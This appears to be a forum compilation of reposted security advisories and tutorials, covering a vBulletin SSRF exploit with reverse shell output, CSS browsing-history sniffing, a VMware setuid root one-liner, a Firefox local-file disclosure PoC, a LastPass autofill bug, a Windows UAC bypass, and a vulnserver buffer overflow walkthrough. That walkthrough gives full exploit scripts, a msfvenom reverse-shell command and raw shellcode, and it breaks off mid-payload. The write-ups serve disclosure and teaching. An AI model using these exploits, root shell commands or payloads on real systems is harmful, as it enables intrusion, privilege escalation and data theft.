Port 22 : Opened Port 25 : Opened Port 80 : Opened Anything juicy? :) Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] y * Executing reverse shell via Zabbix Agent (10050). 192.168.57.10:58940 - - [30/Jul/2016 03:00:45] "HTTP/1.1 GET /zabbixcmd_redir" - 301 Looks like Zabbix Agent executed our bash payload! Check your netcat listening on port 8080 for shell! :) Job done. Exiting Here is how the netcat session looks like after a sucessful exploitation: $ nc -vvv -l -p 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [192.168.57.10] port 8080 [tcp/*] accepted (family 2, sport 54259) zabbix@trusty:/$ id id uid=122(zabbix) gid=129(zabbix) groups=129(zabbix) zabbix@trusty:/$ As we can see reverse shell was executed on the target which sucessfully connected back to the attacker's netcat listener. VI. BUSINESS IMPACT ------------------------- The vulnerability can expose internal services running on the server/within the local network. If not patched, unauthenticated attackers or automated scanners searching for vulnerable servers could send malicious data to internal services. Depending on services in use, the impact could range from sensitive information disclosure, sending spam, DoS/data loss to code execution as demonstrated by the PoC exploit in this advisory. VII. SYSTEMS AFFECTED ------------------------- All vBulletin forums in all branches (5.x, 4.x , 3.x) without the latest patches named in the next section are affected by this vulnerability. VIII. SOLUTION ------------------------- Upon this advisory, vendor has published the following security releases of vBulletin for each of the affected branches: vBulletin 5.2.3 vBulletin 4.2.4 Beta vBulletin 3.8.10 Beta Separate patches have also been released (see references below). IX. REFERENCES ------------------------- http://legalhackers.com http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6483 vBulletin patches: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349551-security-patch-vbulletin-5-2-0-5-2-1-5-2-2 http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349549-security-patch-vbulletin-4-2-2-4-2-3-4-2-4-beta http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349548-security-patch-vbulletin-3-8-7-3-8-8-3-8-9-3-8-10-beta X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com http://legalhackers.com XI. REVISION HISTORY ------------------------- 05.08.2016 - final advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. Sursa: http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt

CSS mix-blend-mode is bad for your browsing history Up until mid-2010, any rogue website could get a good sense of your browsing habits by specifying a distinctive :visited CSS pseudo-class for any links on the page, rendering thousands of interesting URLs off-screen, and then calling the getComputedStyle API to figure out which pages appear in your browser's history. After some deliberation, browser vendors have closed this loophole by disallowing almost all attributes in :visited selectors, spare for the fairly indispensable ability to alter foreground and background colors for such links. The APIs have been also redesigned to prevent the disclosure of this color information via getComputedStyle. This workaround did not fully eliminate the ability to probe your browsing history, but limited it to scenarios where the user can be tricked into unwittingly feeding the style information back to the website one URL at a time. Several fairly convincing attacks have been demonstrated against patched browsers - my own 2013 entry can be found here - but they generally depended on the ability to solicit one click per every URL tested. In other words, the whole thing did not scale particularly well. Or at least, it wasn't supposed to. In 2014, I described a neat trick that exploited normally imperceptible color quantization errors within the browser, amplified by stacking elements hundreds of times, to implement an n-to-2n decoder circuit using just the background-color and opacity properties on overlaid <a href=...> elements to easily probe the browsing history of multiple URLs with a single click. To explain the basic principle, imagine wanting to test two links, and dividing the screen into four regions, like so: Region #1 is lit only when both links are not visited (¬ link_a ∧ ¬ link_b), Region #2 is lit only when link A is not visited but link B is visited (¬ link_a ∧ link_b), Region #3 is lit only when link A is visited but link B is not (link_a ∧ ¬ link_b), Region #4 is lit only when both links are visited (link_a ∧ link_b). While the page couldn't directly query the visibility of the segments, we just had to convince the user to click the visible segment once to get the browsing history for both links, for example under the guise of dismissing a pop-up ad. (Of course, the attack could be scaled to far more than just 2 URLs.) This problem was eventually addressed by browser vendors by simply improving the accuracy of color quantization when overlaying HTML elements; while this did not eliminate the risk, it made the attack far more computationally intensive, requiring the evil page to stack millions of elements to get practical results. Gave over? Well, not entirely. In the footnote of my 2014 article, I mentioned this: "There is an upcoming CSS feature called mix-blend-mode, which permits non-linear mixing with operators such as multiply, lighten, darken, and a couple more. These operators make Boolean algebra much simpler and if they ship in their current shape, they will remove the need for all the fun with quantization errors, successive overlays, and such. That said, mix-blend-mode is not available in any browser today." As you might have guessed, patience is a virtue! As of mid-2016, mix-blend-mode - a feature to allow advanced compositing of bitmaps, very similar to the layer blending modes available in photo-editing tools such as Photoshop and GIMP - is shipping in Chrome and Firefox. And as it happens, in addition to their intended purpose, these non-linear blending operators permit us to implement arbitrary Boolean algebra. For example, to implement AND, all we need to do is use multiply: black (0) x black (0) = black (0) black (0) x white (1) = black (0) white (1) x black (0) = black (0) white (1) x white (1) = white (1) For a practical demo, click here. A single click in that whack-a-mole game will reveal the state of 9 visited links to the JavaScript executing on the page. If this was an actual game and if it continued for a bit longer, probing the state of hundreds or thousands of URLs would not be particularly hard to pull off. Sursa: https://lcamtuf.blogspot.ro/2016/08/css-mix-blend-mode-is-bad-for-keeping.html Sursa: https://lcamtuf.blogspot.ro/2016/08/css-mix-blend-mode-is-bad-for-keeping.html

VMware - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010) // Source: http://blog.cmpxchg8b.com/2013/08/security-debianisms.html On most modern Linux systems, /bin/sh is provided by bash, which detects that it's being invoked as sh, and attempts to mimic traditional sh. As everyone who works in security quickly learns, bash will drop privileges very early if uid != euid. 488 489 if (running_setuid && privileged_mode == 0) 490 disable_priv_mode (); 491 Where disable_priv_mode is defined as: 1202 void 1203 disable_priv_mode () 1204 { 1205 setuid (current_user.uid); 1206 setgid (current_user.gid); 1207 current_user.euid = current_user.uid; 1208 current_user.egid = current_user.gid; 1209 } Non-Linux systems tend to use pdksh as /bin/sh, which also supports privmode since version 5.0.5: 307 /* Turning off -p? */ 308 if (f == FPRIVILEGED && oldval && !newval) { 309 #ifdef OS2 310 ; 311 #else /* OS2 */ 312 setuid(ksheuid = getuid()); 313 setgid(getgid()); 314 #endif /* OS2 */ 315 } else if (f == FPOSIX && newval) { This is surprisingly effective at mitigating some common vulnerability classes and misconfigurations. Indeed, Chet Ramey (bash author and maintainer) explains that the purpose of this is to prevent "bogus system(3) calls in setuid executables", see section 7 of the bash NOTES file. However, this never really happens on Debian derived systems. Debian (and therefore Ubuntu) will use dash by default (see https://wiki.debian.org/DashAsBinSh), or disable it with this patch if you choose to use bash: http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff A nice example of this failing can be observed in the VMware utilities, which try to invoke lsb_release with popen() to learn about the current execution environment. This means you can get a nice easy root shell like this on any Debian/Ubuntu derived system with VMware installed: $ cc -xc - -olsb_release<<<'main(){system("sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount # whoami root It looks like Debian originally decided they didn't want privmode because it broke UUCP (!?). http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586 VMware do list Debian/Ubuntu as supported host platforms though, so they have published a fix for this issue today. If you care about this and can't wait for the patch, you can temporarily remove the setuid bit from vmware-mount like this: # chmod u-s /usr/bin/vmware-mount Note that it is almost impossible to use popen() or system() safely in a setuid program without privmode, even if you specify the full path. This is a fun example from back in 2005, but there are lots more cases. In conclusion, too bad if an otherwise unexploitable bug becomes exploitable, that's the price you pay for high quality uucp support in 2013 ;-) P.S. If you don't know what uucp is, you can read more about it on fidonet or at my gopher site. P.P.S. I sent the dash maintainers a patch today, but I'm not sure if they're interested. Sursa: https://www.exploit-db.com/exploits/40169/

FireFox Local File Disclosure and Same Origin Policy bypass It's possible to read external websites and any file on a victims computer using the 'Save Page As' functionality on Firefox. This is reliant on Firefox's allowance of reading files in the same directory in the file: URI scheme. Which was deemed 'by design'. You can do this with Google Chrome but you can't read the saved files, so Google did not consider this a bug. The PoC The following is the original PoC reported: <html> <head> <title>POC</title> <link rel="stylesheet" href="file:///C://" /> <link rel="stylesheet" href="https://www.facebook.com/" /> </head> <body> <textarea style="width: 434px; height: 310px;" id="facebook"></textarea> <textarea style="width: 434px; height: 310px;" id="files"></textarea> <script type="application/javascript"> var doQ = (q) => { //Simple XMLHttpRequest try { var oReq = new XMLHttpRequest(); oReq.addEventListener("load", function(e) { console.dir(e) }); oReq.open("GET", q, false); oReq.send(); } catch (e) { alert('File not found or restricted.') }; return oReq.response; }; if (location.protocol == 'file:') { facebook.value = doQ('./POC_files/a.htm'); files.value = doQ('./POC_files/a'); } else { alert('Please hit CTRL+S and save this page first then open it locally.'); } </script> </body> </html> Basically, when there is a reference to any website or local file using something like a link tag, initially Firefox blocks these, however, when a user saves the webpage, the 'Save webpage as' part does not do any checks on whether the files being downloaded are legitimate. After the files are downloaded, the folder they are in are predictable (same as title + _files) and so we are able to read a victims local files and external websites with full credentials. Result Screenshot Sursa: http://leucosite.com/FireFox-LFD-and-SOP-Bypass/

How I made LastPass give me all your passwords 2016.07.27 labsdetectify Cross Site ScriptingLastpassMathias KarlssonXSS Note: This issue has already been resolved and pushed to the Lastpass users. Stealing all your passwords by just visiting a webpage. Sounds too bad to be true? That’s what I thought too before I decided to check out the security of the LastPass browser extension. For those who don’t know, LastPass is one of the world’s most popular password managers. I started by noticing that the extension added some HTML code to every page I visited, so I decided to dig into how that worked. A few cups of coffee later, I found something that looked really, really bad. The issue The bug that allowed me to extract passwords was found in the autofill functionality. First, the code parsed the URL to figure out which domain the browser was currently at, then it filled any login forms with the stored credentials. However, the URL parsing code was flawed (bug in URL parsing? shocker!). This was the code (lpParseUri function, un-minified): var fixedURL = URL.match(/^(.*:\/\/[^\/]+\/.*)@/); fixedURL && (url = url.substring(0, fixedURL[1].length) + url.substring(fixedURL[1].length).replace(/@/g, "%40")); By browsing this URL: http://avlidienbrunn.se/@twitter.com/@hehe.php the browser would treat the current domain as avlidienbrunn.se while the extension would treat it as twitter.com. Since the code only URL encodes the last occurence of @, the actual domain is treated as the username portion of the URL. Too bad to be true? Below you see that the extension would fill my form with the stored credentials for twitter.com. After that I could simply go through other commonly used sites and extract credentials for those too. I reported this to LastPass through their responsible disclosure page and the report was handled very professionally. The fix was pushed in less than a day(!), and they even awarded me with a bug bounty of $1,000. Are passwords managers bad? Should we stop using password managers? No. They are still much better than the alternative (password reuse). Although, taking a second to disable autofill functionality is a good move because this isn’t the first autofill bug we’ve seen, and I doubt it will be the last. Also, this would not work if multi factor authentication was on, so you should probably enable that as well. Updates Update #1 2016.07.28: There has been a lot of comments regarding the reward Mathias received from Lastpass. At the time Mathias submitted this they didn’t have a bug bounty so he was more than satisfied with $1,000. Update #2 2016.07.28: Lastpass have made a comment regarding Mathias finding on their blog. Sursa: https://labs.detectify.com/2016/07/27/how-i-made-lastpass-give-me-all-your-passwords/

Bypassing UAC on Windows 10 using Disk Cleanup Matt Graeber (@mattifestation) and I recently dug into Windows 10, and discovered a rather interesting method of bypassing User Account Control (if you aren’t familiar with UAC you can read more about it here). Currently, there are a couple of public UAC bypass techniques, most of which require a privileged file copy using the IFileOperation COM object or WUSA extraction to take advantage of a DLL hijack. You can dig into some of the public bypasses here (by @hfiref0x). The technique covered in this post differs from the other methods and provides a useful alternative as it does not rely on a privileged file copy or any code injection. A common technique used to investigate loading behavior on Windows is to use SysInternals Process Monitor to analyze how a process behaves when executed. After investigating some default Scheduled Tasks that exist on Windows 10 and their corresponding actions, we found that a scheduled task named “SilentCleanup” is configured on stock Windows 10 installations to be launchable by unprivileged users but to run with elevated/high integrity privileges. To find this, we simply went through each task and inspected the security options for “Run with Highest Privileges” to be checked with a non-elevated User Account (such as ‘Users’). Taking a closer look with procmon, we found that the actual process started by the scheduled task, cleanmgr.exe, auto-elevates due to “execute with highest privileges” being set in the task configuration. Let’s dive in a bit more. When cleanmgr.exe executes, it creates a new folder with the name of a GUID in “C:\Users\<username>\AppData\Local\Temp”. Once cleanmgr.exe creates the temporary folder, it then copies multiple DLLs along with “dismhost.exe” into the new folder: After copying DismHost.exe and its DLLs to “C:\Users\<username>\AppData\Temp\<guid>”, cleanmgr.exe then starts “dismhost.exe” out of the newly created path as a high integrity process: Since dismhost.exe launches out of “C:\Users\<username>\AppData\Local\Temp\<guid>”, it begins to load DLLs out of the same folder in a certain order: Because the current medium integrity user has write access to the user’s %TEMP% directory, it is possible to hijack a DLL loaded by dismhost.exe and obtain code execution in a high integrity process. This is commonly known as a “BypassUAC” attack. Since this particular situation is a race condition, we have to replace the target DLL before dismhost.exe loads it. We examined the entire process more closely and determined that “LogProvider.dll” is the last DLL loaded by dismhost.exe, giving us the best chance for a hijack opportunity. With this information, we can use a WMI event to monitor for the creation of “C:\Users\<username>\AppData\Local\Temp\<guid>” and then assign that WMI event an action of hijacking “LogProvider.dll” by copying our “malicious” DLL into “C:\Users\<username>\AppData\Local\Temp\<guid>” and naming it “LogProvider.dll”. Since this action happens before dismhost.exe loads it, it will load our DLL instead of the intended one. Once dismhost.exe loads the DLL, it will load as high integrity, allowing us to bypass User Access Control and obtain code execution as a high integrity process. After additional testing, this technique does not apply to standard user accounts as cleanmgr.exe does not extract any files to %TEMP%. When executed as a standard user in low or medium integrity, the task runs as medium integrity and never elevates past that. Matt Graeber (@mattifestation) wrote an excellent PoC PowerShell script that will register a WMI event to monitor for the creation of the GUID folder by cleanmgr.exe and once detected, it will take the specified DLL and copy it to the GUID folder with the name of “LogProvider.dll”. Once dismhost.exe goes to load “LogProvider.dll”, it will be our malicious DLL instead of the legitimate one, thus bypassing UAC and giving us code execution in High Integrity context. You can find the script here: https://gist.github.com/mattifestation/b4072a066574caccfa07fcf723952d54 To test this, you simply need the PoC script and a DLL with a standard export of dllmain. For testing, you can either create your own DLL or use a simple MessageBox one located here: https://github.com/enigma0x3/MessageBox This technique differs from the other public techniques by having a few benefits that can be handy: This technique does not require any process injection, meaning the attack won’t get flagged by security solutions that monitor for this type of behavior. There is no privileged file copy required. Most UAC bypasses require some sort of privileged file copy in order to get a malicious DLL into a secure location to setup a DLL hijack. Since the scheduled task copies the required stuff to %TEMP%, no privileged file copy is required. This technique cleans up after itself. After the scheduled task is done (and loads our malicious DLL), the task deletes the GUID folder (and files) that it created in %TEMP%. This technique works with the UAC level being set at its highest setting (“Always Notify”) since the task is set to run with “Highest Privileges”. The majority of the public UAC bypasses rely on the IFileOperation COM object to perform a privileged file copy. IFileOperation honors the “Always Notify” UAC setting and prompts when set, causing the privileged file copy to fail: This was disclosed to Microsoft Security Response Center (MSRC) on 07/20/2016. As expected, they responded by noting that UAC isn’t a security boundary, so this doesn’t classify as a security vulnerability, as stated here. While not a vulnerability, it does allow an attacker an alternate method to move to high integrity that differs from previous bypasses and introduces one more location or chokepoint that must be monitored to observe attacker behavior. This particular technique can be remediated or fixed by disabling the task or removing the requirement for running with highest privileges. Further, if you would like to monitor for this attack, you could utilize methods/signatures to look for new WMI events as it is required to monitor for new folder creation for this attack to succeed. Combining this with App/DLL whitelisting and monitoring for abnormal modules being loaded (e.g. Sysmon event ID 7) would also limit the success of such an attack. *Update: As always, users should follow best practices and not use an administrative account for daily computer usage. Sursa: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/

Buffer Overflows and you! Posted on July 22, 2016 by T0w3ntum in Exploit Development I wanted to do an article on Buffer Overflows, there are many articles on Buffer Overflows, but this one is mine! I’m going to take it easy on the first go and do a simple Stack Based buffer overflow. So let’s get started. For this I’ll be using vulnserver. It’s an intentionally vulnerable binary for you to practice on. I did this from my Windows 10 machine, but you are free to use whatever flavor of Windows you want. Simply download the files, unzip, and run it. Now remember, this is intentionally vulnerable…So maybe turn off your internet or run it in a VM. Fuzzing So let’s load up immunity and see what happens when we throw a bunch of crap at it. I’ll be targeting the TRUN function of vulnserver. First we need some fuzzer code: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 #!/user/bin/python import socket import sys buffer=["A"] counter=100 while len(buffer) <= 100: buffer.append("A"*counter) counter=counter+200 for string in buffer: print "[+] Fuzzing vulnserver with %s bytes" % len(string) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect(('192.168.1.8',6666)) s.recv(1024) s.send( sys.argv[1]+" ."+string) #Note the "." as it's important. data = s.recv(1024) print data s.send('EXIT\r\n') s.close() When we run this, we get a crash around 2100 bytes. We can easily verify that the EIP is overwritten by looking at the CPU Registers in immunity. Note the EIP is now full of 41414141 or AAAA. This means that our long string of A’s has overwritten the EIP register and broke the flow of the application as 41414141 is not a valid address. Gaining Control Now that we know roughly how much data we need to throw at it to crash it, we need to find the exact point where the EIP is overwritten. This is easily done by generating a unique pattern 2100 bytes in length and crashing the application again. Luckily, the Metasploit framework comes with a handy tool for doing just that. 1 /usr/share/metasploit-framework/tools/exploit/pattern_create.rb 2100 This will create a unique pattern that we can crash the application with. Let’s update our code with the new string. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 #!/user/bin/python import socket buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9' print "[+] Sending buffer. Check EIP after crash." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect(('192.168.1.8',6666)) s.recv(1024) s.send('TRUN .'+buffer) data = s.recv(1024) print data s.send('EXIT\r\n') s.close() When we fire this off and check the EIP we’ll see a new unique string there. If we run that through pattern_offset we can find the exact offset before we overwrite the EIP register. In this case it’s at 2006. 1 2 /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 396F4338 [*] Exact match at offset 2006 Let’s verify the offset by overwriting EIP with our own bit of code. I like to use 0xdeadbeef because why not? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 #!/user/bin/python import socket from struct import * buffer = 'A' * 2006 buffer += pack('<L', 0xdeadbeef) print "[+] Sending buffer. Check EIP after crash." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect(('192.168.1.8',6666)) s.recv(1024) s.send('TRUN .'+buffer) data = s.recv(1024) print data s.send('EXIT\r\n') s.close() After running this, we can see that we have successfully overwritten EIP with DEADBEEF. SWEEEET! We now control EIP. This means we control the flow of the application. The next step is to see how much room we have for our shellcode. We could put it in the initial string of A’s before the crash, but let’s see how much further past the EIP we can write to the stack. Adding in Shellcode As I mentioned, we need to find some room for our shellcode so let’s update our code to squeez in some C’s. I’ll start with 400 bytes of C’s as that should be enough for a simple reverse shell. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 #!/user/bin/python import socket from struct import * buffer = 'A' * 2006 buffer += pack('<L', 0xdeadbeef) buffer += 'C' * 400 print "[+] Sending buffer. Check EIP after crash." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect(('192.168.1.8',6666)) s.recv(1024) s.send('TRUN .'+buffer) data = s.recv(1024) print data s.send('EXIT\r\n') s.close() After firing this off and looking at the dump we can see a couple of things. First is that all of our C’s seem to fit and second, they start right at the ESP. The image below, with it’s crappy highlighting, show’s the ESP. You can verify this by looking at the ESP value in the registers. This is good for a couple of reason. We know we have enough room for our shellcode, and we know that all we need to do is jump to the ESP to execute our shellcode. What do I mean by this? Well, since we control EIP, we can tell the application do go wherever we want. So what we need to do is tell it to go to an instruction call that says jmp esp. This will cause the application to go to the top of the stack and start executing our shellcode. But first, let’s find out what characters the application can and cannot handle. Finding Bad Characters In order to have successful execution, we need to make sure the application properly reads all of our characters. To do this, we need to send in a string of bad characters and then check the stack dump. If there is a break in the string, we can assume there is a bad characters, remove it, and send the string again. Fortunately for us there didn’t seem to be any bad characters in this application. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 #!/user/bin/python import socket from struct import * badchar = "" badchar += "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" badchar += "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f" badchar += "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" badchar += "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" badchar += "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" badchar += "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" badchar += "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" badchar += "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" buffer = 'A' * 2006 buffer += pack('<L', 0xdeadbeef) buffer += badchar print "[+] Sending buffer. Check EIP after crash." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect(('192.168.1.8',6666)) s.recv(1024) s.send('TRUN .'+buffer) data = s.recv(1024) print data s.send('EXIT\r\n') s.close() Finding our Return Address So how do we go about finding a jmp esp instruction call? With the power of Mona that’s how! First we need to find a module loaded in the application that doesn’t have any of the fancy memory protections. In this case, I’ll use essfunc.dll, so let’s see if there is a jmp esp call within that module. We’ll just use the top address as our return. Finalizing the Exploit Alright, we’ve done all the leg work. Now let’s finalize this exploit and get ourselves a shell! I’ll use msfvenom to generate some shellcode for us. 1 msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.21 LPORT=4444 --smallest -f python -v payload -b '\x00' We’ll use the shell_reverse_tcp as it’s none-staged and relatively small. Note I’m also declaring the NULL character, 0x00, as a bad character. So let’s update our script. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 #!/user/bin/python import socket from struct import * ret = pack('<L', 0x625011AF) payload = "" payload += "\x33\xc9\x66\xb9\x43\x01\xe8\xff\xff\xff\xff\xc1" payload += "\x5e\x30\x4c\x0e\x07\xe2\xfa\xfd\xea\x81\x04\x05" payload += "\x06\x67\x81\xec\x3b\xcb\x68\x86\x5e\x3f\x9b\x43" payload += "\x1e\x98\x46\x01\x9d\x65\x30\x16\xad\x51\x3a\x2c" payload += "\xe1\xb3\x1c\x40\x5e\x21\x08\x05\xe7\xe8\x25\x28" payload += "\xed\xc9\xde\x7f\x79\xa4\x62\x21\xb9\x79\x08\xbe" payload += "\x7a\x26\x40\xda\x72\x3a\xed\x6c\xb5\x66\x60\x40" payload += "\x91\xc8\x0d\x5d\xa5\x7d\x01\xc2\x7e\xc0\x4d\x9b" payload += "\x7f\xb0\xfc\x90\x9d\x5e\x55\x92\x6e\xb7\x2d\xaf" payload += "\x59\x26\xa4\x66\x23\x7b\x15\x85\x3a\xe8\x3c\x41" payload += "\x67\xb4\x0e\xe2\x66\x20\xe7\x35\x72\x6e\xa3\xfa" payload += "\x76\xf8\x75\xa5\xff\x33\x5c\x5d\x21\x20\x1d\x24" payload += "\x24\x2e\x7f\x61\xdd\xdc\xde\x0e\x94\x6c\x05\xd4" payload += "\xe2\xb8\xbe\x8d\x8e\xe7\xe7\xe2\xa0\xcc\xc0\xfd" payload += "\xda\xe0\xbe\x9e\x65\x4e\x24\x0d\x9f\x9f\xa0\x88" payload += "\x66\xf7\xf4\xcd\x8f\x27\xc3\xa9\x55\x7e\xfc\xfd" payload += "\xfe\xff\xf0\xe1\xf2\xe3\xdc\x5f\xb9\x68\x58\x46" payload += 